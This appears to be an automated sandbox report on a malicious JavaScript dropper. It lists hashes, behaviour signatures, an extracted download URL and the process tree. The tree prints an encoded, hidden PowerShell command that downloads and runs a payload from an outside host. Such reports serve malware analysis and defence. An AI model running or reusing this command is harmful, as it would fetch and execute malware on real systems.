Analysis

  • max time kernel
    0s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    06/01/2024, 10:04

General

  • Target

    3c61d239a11ae0d2be0f6bd9c3e3b715.js

  • Size

    78KB

  • MD5

    3c61d239a11ae0d2be0f6bd9c3e3b715

  • SHA1

    34b463b87711ce55d58a4256cc3802e11ae0906f

  • SHA256

    6db41851a55f3efacb61f780d08271b884a5fe346725b7e22b1e082702dcab62

  • SHA512

    40c023c05c55a197204c3708d7f5769e7f309322fd109cc2d09ceec9a4fc54a4929e9ec42b5ff8c126fbfb2557cc1589fd65667b174fc8876ab39375b6757d13

  • SSDEEP

    1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oU:59Ry98guHVBqqg2bcruzUHmLKeMMU7GK

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3c61d239a11ae0d2be0f6bd9c3e3b715.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
        PID:1580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      1⤵
        PID:3060

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/3060-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

        Filesize

        32KB

      • memory/3060-8-0x0000000002C50000-0x0000000002CD0000-memory.dmp

        Filesize

        512KB

      • memory/3060-11-0x0000000002C50000-0x0000000002CD0000-memory.dmp

        Filesize

        512KB

      • memory/3060-10-0x0000000002C50000-0x0000000002CD0000-memory.dmp

        Filesize

        512KB

      • memory/3060-9-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

        Filesize

        9.6MB

      • memory/3060-7-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

        Filesize

        9.6MB

      • memory/3060-5-0x000000001B570000-0x000000001B852000-memory.dmp

        Filesize

        2.9MB

      • memory/3060-12-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

        Filesize

        9.6MB